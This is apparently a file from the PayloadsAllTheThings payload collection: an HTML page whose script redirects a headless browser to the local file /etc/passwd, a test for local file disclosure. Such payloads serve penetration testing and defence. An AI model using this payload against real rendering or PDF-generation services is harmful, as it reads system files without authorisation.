PayloadsAllTheThings/Headless Browser/files/window_location_js.html

7 lines
114 B
HTML
Raw Normal View History

2024-05-30 22:07:21 +00:00
<html>
<body>
<script>
window.location="/etc/passwd"
</script>
</body>
</html>